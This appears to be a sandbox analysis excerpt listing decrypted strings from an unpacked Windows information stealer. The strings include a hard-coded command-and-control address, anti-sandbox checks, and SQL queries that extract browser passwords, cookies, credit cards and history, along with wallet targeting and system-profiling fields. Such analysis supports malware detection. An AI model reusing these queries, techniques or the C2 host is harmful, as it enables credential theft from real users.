                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CloseHandle
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Sleep
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetUserDefaultLangID
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: VirtualAllocExNuma
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: VirtualFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetSystemInfo
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: VirtualAlloc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HeapAlloc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetComputerNameA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: lstrcpyA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetProcessHeap
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetCurrentProcess
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: lstrlenA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ExitProcess
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GlobalMemoryStatusEx
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetSystemTime
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SystemTimeToFileTime
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: advapi32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: gdi32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: user32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: crypt32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetUserNameA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateDCA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetDeviceCaps
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ReleaseDC
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CryptStringToBinaryA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sscanf
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: VMwareVMware
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HAL9TH
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: JohnDoe
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DISPLAY
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %hu/%hu/%hu
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: http://185.215.113.206
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: /c4becf79229cb002.php
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: /68b591d6548ec281/
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: stok
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetEnvironmentVariableA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetFileAttributesA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HeapFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetFileSize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GlobalSize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateToolhelp32Snapshot
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: IsWow64Process
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Process32Next
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLocalTime
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FreeLibrary
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetTimeZoneInformation
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetSystemPowerStatus
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetVolumeInformationA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetWindowsDirectoryA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Process32First
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLocaleInfoA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetUserDefaultLocaleName
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetModuleFileNameA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DeleteFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FindNextFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: LocalFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FindClose
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SetEnvironmentVariableA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: LocalAlloc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetFileSizeEx
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ReadFile
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SetFilePointer
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: WriteFile
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FindFirstFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CopyFileA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: VirtualProtect
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetLastError
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: lstrcpynA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: MultiByteToWideChar
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GlobalFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: WideCharToMultiByte
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GlobalAlloc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: OpenProcess
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: TerminateProcess
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetCurrentProcessId
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: gdiplus.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ole32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: bcrypt.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wininet.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: shlwapi.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: shell32.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: rstrtmgr.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateCompatibleBitmap
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SelectObject
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BitBlt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DeleteObject
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateCompatibleDC
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipGetImageEncodersSize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipGetImageEncoders
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdiplusStartup
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdiplusShutdown
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipSaveImageToStream
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipDisposeImage
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GdipFree
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetHGlobalFromStream
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CreateStreamOnHGlobal
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CoUninitialize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CoInitialize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CoCreateInstance
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptDecrypt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptSetProperty
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptDestroyKey
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetWindowRect
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetDesktopWindow
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetDC
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CloseWindow
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wsprintfA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: EnumDisplayDevicesA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetKeyboardLayoutList
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CharToOemW
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wsprintfW
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegQueryValueExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegEnumKeyExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegOpenKeyExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegCloseKey
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RegEnumValueA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CryptBinaryToStringA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CryptUnprotectData
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SHGetFolderPathA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ShellExecuteExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetOpenUrlA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetConnectA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetCloseHandle
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HttpSendRequestA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HttpOpenRequestA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetReadFile
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: InternetCrackUrlA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: StrCmpCA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: StrStrA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: StrCmpCW
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PathMatchSpecA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: GetModuleFileNameExA
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmStartSession
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmRegisterResources
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmGetList
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: RmEndSession
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_open
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_prepare_v2
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_step
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_column_text
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_finalize
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_close
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_column_bytes
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: sqlite3_column_blob
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: encrypted_key
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PATH
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: NSS_Init
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: NSS_Shutdown
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11_GetInternalKeySlot
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11_FreeSlot
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11_Authenticate
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: PK11SDR_Decrypt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: C:\ProgramData\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: browser:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: profile:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: url:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: login:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: password:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Opera
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: OperaGX
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Network
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: .txt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: TRUE
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: FALSE
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: autofill
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: history
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: cc
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: name:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: month:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: year:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: card:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Login Data
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Web Data
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: History
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: logins.json
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: formSubmitURL
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: usernameField
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: encryptedUsername
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: encryptedPassword
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: guid
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: cookies.sqlite
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: formhistory.sqlite
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: places.sqlite
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: plugins
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Local Extension Settings
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Sync Extension Settings
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: IndexedDB
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Opera Stable
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Opera GX Stable
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: CURRENT
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: chrome-extension_
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: _0.indexeddb.leveldb
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Local State
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: profiles.ini
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: chrome
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: opera
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: firefox
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: wallets
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %08lX%04lX%lu
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: ProductName
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: x32
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: x64
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DisplayName
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: DisplayVersion
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Network Info:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - IP: IP?
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Country: ISO?
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: System Summary:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - HWID:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - OS:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Architecture:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - UserName:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Computer Name:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Local Time:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - UTC:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Language:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Keyboards:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Laptop:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Running Path:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - CPU:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Threads:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Cores:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - RAM:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - Display Resolution:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: - GPU:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: User Agents:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Installed Apps:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: All Users:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Current User:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: Process List:
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: system_info.txt
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: freebl3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: mozglue.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: msvcp140.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: nss3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: softokn3.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: vcruntime140.dll
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: \Temp\
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: .exe
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: runas
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: open
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: /c start
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %DESKTOP%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %APPDATA%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %LOCALAPPDATA%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %USERPROFILE%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %DOCUMENTS%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %PROGRAMFILES_86%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: %RECENT%
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: *.lnk
                                      Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpackString decryptor: files
